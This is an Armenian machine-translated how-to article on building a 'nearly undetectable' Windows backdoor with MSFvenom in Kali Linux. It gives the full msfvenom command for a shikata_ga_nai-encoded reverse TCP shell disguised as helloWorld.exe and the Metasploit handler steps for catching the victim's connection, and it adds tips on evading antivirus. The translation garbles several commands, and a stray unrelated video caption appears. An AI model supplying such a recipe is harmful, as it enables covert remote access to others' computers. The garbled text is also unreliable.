Ինչպես ստեղծել գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում

Բովանդակություն:

Ինչպես ստեղծել գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում
Ինչպես ստեղծել գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում

Video: Ինչպես ստեղծել գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում

Video: Ինչպես ստեղծել գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում
Video: Ask your Clash of Clans questions here! We will help you!! 2024, Մայիս
Anonim

Հետնամասը օգտագործվում է անվտանգության մեխանիզմները շրջանցելու համար, հաճախ գաղտնի և հիմնականում աննկատելի: Օգտագործելով MSFvenom- ը ՝ msfpayload- ի և msfencode- ի համադրությունը, հնարավոր է ստեղծել հետնամաս, որը հետ կապվում է հարձակվողին ՝ օգտագործելով հակառակ պատյան TCP: Հետդուռ ստեղծելու համար հարկավոր է փոխել ձեր չարամիտ ծրագրերի ստորագրությունը ՝ հակավիրուսային ծրագրերից խուսափելու համար: Ավարտեք այս նախագիծը մի զույգ համակարգիչների վրա, որոնց մուտք գործելու թույլտվություն ունեք, և այդ ընթացքում դուք ավելին կիմանաք համակարգչային անվտանգության և ինչպես է աշխատում այս տեսակի դռները:

Քայլեր

Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 1
Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 1

Քայլ 1. Գործարկեք Kali- ն և գործարկեք Terminal վահանակը:

Ստեղծեք գրեթե չբացահայտվող հետդուռ ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 2
Ստեղծեք գրեթե չբացահայտվող հետդուռ ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 2

Քայլ 2. Մուտքագրեք ifconfig ՝ ինտերֆեյսը ցուցադրելու և ձեր IP հասցեն ստուգելու համար:

Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 3
Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 3

Քայլ 3. Մուտքագրեք msfvenom -l կոդավորիչները `կոդավորողների ցանկը ցուցադրելու համար:

Որպես կոդավորիչ ՝ դուք կօգտագործեք x86/shikata_ga_nai:

Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 4
Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 4

Քայլ 4. Մուտքագրեք "msfvenom -a x86 -պլատֆորմային պատուհաններ -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe

  • -a x86 -պլատֆորմի պատուհանները նշանակում են օգտագործման ճարտարապետություն:
  • -p windows/shell/reverse_tcp նշանակում է բեռներ, որոնք պետք է տեղադրվեն:
  • LHOST- ը նշանակում է լսողի IP հասցեն:
  • LPORT- ը նշանակում է լսողի նավահանգիստ:
  • -b "\ x00" նշանակում է խուսափել վատ նիշից (զրոյական բայթ):
  • -e x86/shikata_ga_nai նշանակում է կոդավորողների անունը:
  • -f exe> helloWorld.exe նշանակում է ձևաչափի ելք:
Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 5
Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 5

Քայլ 5. Մուտքագրեք msfconsole- ը `Metasploit- ը ակտիվացնելու համար:

Այժմ դուք ստեղծել եք ձեր հետնամասը: Երբ զոհը կտտացնում է helloWorld.exe- ին, ներկառուցված կեղևի ծանրաբեռնվածությունը կակտիվանա և նորից կապ կհաստատի ձեր համակարգին: Կապը ստանալու համար դուք պետք է բացեք բազմաբեռնիչը Metasploit- ում և սահմանեք բեռնվածությունը:

Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 6
Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 6

Քայլ 6. Մուտքագրեք use exploit/multi/handler:

Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 7
Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 7

Քայլ 7. Մուտքագրեք set loadload windows/shell/reverse_tcp:

Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 8
Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 8

Քայլ 8. Մուտքագրեք ցուցադրման ընտրանքները `մոդուլը ստուգելու համար:

Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 9
Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 9

Քայլ 9. Մուտքագրեք հավաքածու LHOST 192.168.48.129:

«LHOST» - ը նշանակում է ունկնդրի IP հասցեն:

Ստեղծեք գրեթե չբացահայտվող հետդիր ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 10
Ստեղծեք գրեթե չբացահայտվող հետդիր ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 10

Քայլ 10. Մուտքագրեք հավաքածու LPORT 4444:

«LPORT» - ը նշանակում է լսողի նավահանգիստ:

Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 11
Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 11

Քայլ 11. Մուտքագրեք run և սպասեք զոհի մեքենայից միացմանը:

Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 12
Ստեղծեք գրեթե չբացահայտվող հետնամաս ՝ օգտագործելով MSFvenom- ը Kali Linux- ում Քայլ 12

Քայլ 12. Սպասեք, մինչև զոհը կտտացնի helloWorld.exe- ին:

Այնուհետև հաջողությամբ միացված կլինեք զոհի մեքենային:

Խորհուրդներ

  • -I- ի օգտագործումը MSFvenom- ում կներկայացնի կոդավորման կրկնությունները: Երբեմն ավելի շատ կրկնություններ կարող են օգնել խուսափել AV ծրագրակազմից:
  • Դուք սովորել եք, թե ինչպես է ստեղծվում հետնամուտքն ու կոդավորվածը ՝ օգտագործելով MSFvenom- ը, սակայն մեր օրերում այս մեթոդը կատարյալ չի աշխատի որոշ AV ծրագրակազմերի դեմ: Դրա պատճառը MSFvenom- ում կատարման ձևանմուշներն են: AV վաճառողները ավելացրել են այս կաղապարների ստատիկ ստորագրությունը և պարզապես փնտրում դրանք: Այս հարցի լուծումը տարբեր կատարման ձևանմուշի կամ տարբեր գործիքների օգտագործումն է:

Խորհուրդ ենք տալիս: